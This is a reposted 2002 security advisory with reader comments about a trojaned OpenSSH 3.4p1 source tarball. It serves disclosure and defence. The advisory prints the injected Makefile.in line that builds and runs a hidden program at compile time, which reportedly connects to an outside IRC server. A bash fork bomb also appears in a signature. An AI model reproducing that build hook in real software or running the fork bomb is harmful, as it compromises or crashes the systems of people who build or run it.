Trojan horse in OpenSSH 3.4p1 source distribution
| From: | Mikael Olsson <mikael.olsson@clavister.com> | |
| To: | bugtraq@securityfocus.com | |
| Subject: | openssh-3.4p1.tar.gz distribution recently trojaned | |
| Date: | Thu, 01 Aug 2002 13:20:47 +0200 |
From http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security ----- Forwarded message from Edwin Groothuis <edwin@mavetju.org> ----- Date: Thu, 1 Aug 2002 16:55:51 +1000 From: Edwin Groothuis <edwin@mavetju.org> To: incidents@securityfocus.com Subject: openssh-3.4p1.tar.gz trojaned Greetings, Just want to inform you that the OpenSSH package op ftp.openbsd.org (and probably all its mirrors now) it trojaned: ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz The OpenBSD people have been informed about it (via email to deraadt@openbsd.org and via irc.openprojects.org/#openbsd) The changed files are openssh-3.4p1/openbsd-compat/Makefile.in: all: libopenbsd-compat.a + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out & bf-test.c[1] is nothing more than a wrapper which generates a shell-script[2] which compiles itself and tries to connect to an server running on 203.62.158.32:6667 (web.snsonline.net). [1] http://www.mavetju.org/~edwin/bf-test.c [2] http://www.mavetju.org/~edwin/bf-output.sh This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD ports system: MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8 This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz: MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57 Edwin -- Edwin Groothuis | Personal website: http://www.MavEtJu.org edwin@mavetju.org | Weblog: http://www.mavetju.org/weblog/weblog.php bash$ :(){ :|:&};: | Interested in MUDs? http://www.FatalDimensions.org/
Posted Aug 1, 2002 15:07 UTC (Thu)
by craighagan (guest, #3045)
[Link] (2 responses)
I recommend other folks check their sources so that
Posted Aug 1, 2002 15:08 UTC (Thu)
by craighagan (guest, #3045)
[Link]
Posted Aug 1, 2002 16:22 UTC (Thu)
by erat (guest, #21)
[Link]
This appears to be a FreeBSD ports thing. I build fromTrojan horse in OpenSSH 3.4p1 source distribution
sources downloaded from the openssh website within 24 hours
of the release. I've double-checked said sources and
do *not* see either the Makefile.in modification
nor the bf-test.c source via find.
either the ports origin -- or a hack at openssh's distribution
point can be confirmed.
silly me. i forgot that -ports ftp's the software upon build.
Trojan horse in OpenSSH 3.4p1 source distribution
I built 3.4p1 last night from a tarball downloaded from openssh.com. No trojan found, and the checksum matched the "good" checksum from the security alert.
Trojan horse in OpenSSH 3.4p1 source distribution